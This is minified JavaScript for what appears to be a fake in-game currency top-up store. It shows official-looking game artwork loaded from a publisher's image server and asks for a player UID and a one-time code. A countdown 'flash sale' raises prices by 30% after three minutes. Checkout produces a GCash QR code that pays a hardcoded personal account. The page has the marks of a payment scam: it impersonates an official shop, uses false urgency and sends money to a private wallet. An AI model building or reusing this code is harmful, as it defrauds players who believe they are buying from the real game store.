const CONFIG={userId:"DWQM4TK3JDNXHVH3U",name:"NA******L G.",location:"Pulong Balibag",postal:"1234"},ASSETS={logo:"https://gimages.37games.com/aws_s3/img?s=/platform/one_image/2025/09/175809014247953944.png",diamond:"https://gimages.37games.com/aws_s3/img?s=/platform/one_image/2025/09/175809014332663363.png",gcash:"https://img.utdstc.com/icon/711/4cb/7114cb1d21a6384a13ea739687e23c1faa7c131954b8d39d6da308cde9cdc04c:200"},products=[{id:1,name:"30 Spirit Coins",basePrice:750,diamond:150},{id:2,name:"50 Spirit Coins",basePrice:1250,diamond:250},{id:3,name:"100 Spirit Coins",basePrice:2500,diamond:500},{id:4,name:"150 Spirit Coins",basePrice:3750,diamond:750},{id:5,name:"300 Spirit Coins",basePrice:7500,diamond:1500},{id:6,name:"500 Spirit Coins",basePrice:1e4,diamond:2250}];let cart=[],isFlashSaleOver=!1,popperInstance=null,qrCodeGenerator=null;function crc16(e){let t=65535;for(let a=0;a<e.length;a++){t^=e.charCodeAt(a)<<8;for(let n=0;n<8;n++)32768&t?t=t<<1^4129:t<<=1}return(65535&t).toString(16).toUpperCase().padStart(4,"0")}function emv(e,t){return e+t.length.toString().padStart(2,"0")+t}function generateGcashPayload(e){let t=emv("00","com.p2pqrpay")+emv("01","GXCHPHM2XXX")+emv("02","99964403")+emv("03","217020000000656")+emv("04",CONFIG.userId),a=emv("00","01");return a+=emv("01",e?"12":"11"),a+=emv("27",t),a+=emv("52","6016"),a+=emv("53","608"),e&&e>0&&(a+=emv("54",parseFloat(e).toFixed(2))),a+=emv("58","PH"),a+=emv("59",CONFIG.name),a+=emv("60",CONFIG.location),a+=emv("61",CONFIG.postal),(a+="6304")+crc16(a)}async function cacheImages(){for(let[e,t]of Object.entries(ASSETS)){let a=localStorage.getItem(`cache_${e}`);if(!a)try{let n=await fetch(t),i=await n.blob();a=await new Promise(e=>{let t=new FileReader;t.onloadend=()=>e(t.result),t.readAsDataURL(i)}),localStorage.setItem(`cache_${e}`,a)}catch(r){a=t}document.querySelectorAll(`[data-src="${e}"]`).forEach(e=>e.src=a)}}function initStore(){let e=document.getElementById("product-grid"),t=localStorage.getItem("cache_logo")||ASSETS.logo,a=localStorage.getItem("cache_diamond")||ASSETS.diamond;e.innerHTML=products.map(e=>{let n=Math.round(1.3*e.basePrice),i=isFlashSaleOver?n:e.basePrice;return`
        <div class="group relative card-bg rounded-xl overflow-hidden border border-gray-800 transition-all hover:border-yellow-600/50">
            <div class="absolute top-0 left-0 promo-ribbon px-2 py-1.5 z-10 flex items-center space-x-1">
                <img src="${a}" class="w-3 h-3 object-contain">
                <span class="text-black text-[9px] font-black italic">+${e.diamond} (Bonus)</span>
            </div>
            ${isFlashSaleOver?"":'<div class="absolute top-2 right-2 bg-red-600/20 text-red-500 text-[10px] px-2 py-0.5 rounded font-black border border-red-500/30">30% OFF</div>'}
            <div class="h-32 flex items-center justify-center p-4">
                <img src="${t}" class="w-16 h-16 coin-glow pointer-events-none">
            </div>
            <div class="p-3 bg-gray-900/60 border-t border-gray-800/50 pointer-events-none">
                <h3 class="font-bold text-xs text-white mb-2 truncate">${e.name}</h3>
                <div class="flex justify-between items-end">
                    <div class="flex flex-col">
                        ${isFlashSaleOver?"":`<span class="text-[10px] text-gray-500 line-through">${n} PHP</span>`}
                        <span class="text-sm font-black text-yellow-500">${i} PHP</span>
                    </div>
                    <button class="add-to-cart-trigger pointer-events-auto bg-[#f3bc3e] text-black p-2 rounded-lg active:scale-90 transition-transform" data-id="${e.id}">
                        <svg class="w-5 h-5 pointer-events-none" fill="none" stroke="currentColor" stroke-width="2.5" viewBox="0 0 24 24"><path d="M3 3h2l.4 2M7 13h10l4-8H5.4M7 13L5.4 5M7 13l-2.293 2.293c-.63.63-.184 1.707.707 1.707H17m0 0a2 2 0 100 4 2 2 0 000-4zm-8 2a2 2 0 11-4 0 2 2 0 014 0z"></path></svg>
                    </button>
                </div>
            </div>
        </div>`}).join(""),e.querySelectorAll(".add-to-cart-trigger").forEach(e=>e.onclick=()=>addToCart(parseInt(e.dataset.id)))}function addToCart(e){let t=products.find(t=>t.id===e),a=isFlashSaleOver?Math.round(1.3*t.basePrice):t.basePrice,n=cart.find(t=>t.id===e);n?n.qty++:cart.push({...t,price:a,qty:1}),updateTotalsOnly(),renderCartList()}function updateTotalsOnly(){let e=cart.reduce((e,t)=>e+t.price*t.qty,0),t=cart.reduce((e,t)=>e+t.qty,0),a=e.toLocaleString()+".00 PHP";document.getElementById("bar-total").innerText=a,document.getElementById("bar-count").innerText=t,document.getElementById("drawer-total").innerText=a,document.getElementById("drawer-count").innerText=t,document.getElementById("bottom-payment-total").innerText=a,document.getElementById("payment-final-total").innerText=a}function renderCartList(){let e=document.getElementById("cart-items-container"),t=localStorage.getItem("cache_logo")||ASSETS.logo;if(0===cart.length){e.innerHTML='<div class="text-center py-6 text-gray-400 uppercase text-xs font-bold">Empty</div>';return}e.innerHTML=cart.map((e,a)=>`
        <div class="flex items-center space-x-4 border-b pb-4 last:border-0">
            <div class="w-12 h-12 bg-gray-50 rounded-lg p-1 border flex-shrink-0"><img src="${t}" class="w-full h-full object-contain"></div>
            <div class="flex-1">
                <div class="flex justify-between font-black text-xs uppercase text-gray-900"><span>${e.name}</span><button onclick="removeItem(${a})" class="text-gray-300 hover:text-red-500">✕</button></div>
                <div class="flex items-center mt-2 border rounded w-max bg-white text-gray-900 shadow-sm"><button onclick="updateQty(${a}, -1)" class="px-3 py-1">-</button><span class="px-4 py-1 font-bold text-xs text-center min-w-[35px]">${e.qty}</span><button onclick="updateQty(${a}, 1)" class="px-3 py-1">+</button></div>
            </div>
        </div>`).join("")}function updateQty(e,t){cart[e].qty+=t,cart[e].qty<1&&cart.splice(e,1),updateTotalsOnly(),renderCartList()}function removeItem(e){cart.splice(e,1),updateTotalsOnly(),renderCartList()}function toggleCart(){let e=document.getElementById("cart-drawer"),t=document.getElementById("arrow-icon");e.classList.contains("translate-y-0")?(e.classList.add("translate-y-full"),e.classList.remove("translate-y-0","opacity-100"),t.classList.remove("rotate-180"),setTimeout(()=>{e.classList.contains("translate-y-full")&&(e.style.visibility="hidden")},400)):(e.style.visibility="visible",e.classList.remove("translate-y-full"),e.classList.add("translate-y-0","opacity-100"),t.classList.add("rotate-180"))}function showValidationPopover(e,t){let a=document.getElementById(e),n=document.getElementById("popover-validation");document.getElementById("popover-message").innerText=t,popperInstance&&popperInstance.destroy(),n.classList.remove("invisible","opacity-0"),popperInstance=Popper.createPopper(a,n,{placement:"top",strategy:"fixed",modifiers:[{name:"offset",options:{offset:[0,12]}},{name:"preventOverflow",options:{boundary:"viewport"}}]}),setTimeout(()=>{n.classList.add("invisible","opacity-0")},4e3)}function openPayment(){let e=document.getElementById("uid_input"),t=document.getElementById("otp_input"),a=e.value.trim(),n=t.value.trim(),i=localStorage.getItem("cache_logo")||ASSETS.logo,r=localStorage.getItem("cache_diamond")||ASSETS.diamond;if(0===cart.length){showValidationPopover("store-submit-btn","Please select an item first.");return}if(!a||4!==n.length){document.getElementById("input-section").scrollIntoView({behavior:"smooth",block:"center"}),a?(showValidationPopover("otp_input","Valid 4-digit OTP required."),t.focus()):(showValidationPopover("uid_input","A valid Player UID is required."),e.focus());return}let s=document.getElementById("payment-view");s.classList.remove("invisible","pointer-events-none","translate-y-full"),document.getElementById("payment-count").innerText=cart.reduce((e,t)=>e+t.qty,0),document.getElementById("payment-items-list").innerHTML=cart.map(e=>`
        <div class="flex-shrink-0 text-center w-28 bg-gray-50 p-2 rounded-lg border">
            <div class="flex justify-center space-x-1 mb-1"><img src="${i}" class="h-5"><img src="${r}" class="h-5"></div>
            <p class="text-[9px] font-black text-[#d35a44]">Diamond*${e.diamond}(Bonus)</p>
            <p class="text-[9px] font-bold text-gray-800 mt-1">Qty: ${e.qty}</p>
        </div>`).join("")}function closePayment(){let e=document.getElementById("payment-view");e.classList.add("translate-y-full"),setTimeout(()=>e.classList.add("invisible","pointer-events-none"),400)}function showQR(){let e=cart.reduce((e,t)=>e+t.price*t.qty,0),t=generateGcashPayload(e);document.getElementById("qr-amount-display").innerText=e.toLocaleString()+".00 PHP";let a=document.getElementById("qr-modal");a.classList.remove("hidden"),setTimeout(()=>a.classList.add("opacity-100"),10),qrCodeGenerator.makeCode(t)}function hideQR(){document.getElementById("qr-modal").classList.remove("opacity-100"),setTimeout(()=>document.getElementById("qr-modal").classList.add("hidden"),300)}function dismissBanner(){let e=document.getElementById("sticky-banner");e&&(e.remove(),document.getElementById("content-wrapper").classList.replace("pt-16","pt-4")),isFlashSaleOver=!0,initStore(),cart=[],updateTotalsOnly()}function startTimer(e,t){let a=e,n,i,r=setInterval(()=>{n=parseInt(a/60,10),i=parseInt(a%60,10),t.textContent=`${n<10?"0"+n:n}:${i<10?"0"+i:i}`,--a<0&&(clearInterval(r),dismissBanner())},1e3)}window.onload=async()=>{await cacheImages(),startTimer(180,document.querySelector("#timer")),initStore(),qrCodeGenerator=new QRCode(document.getElementById("qrcode"),{width:180,height:180})};
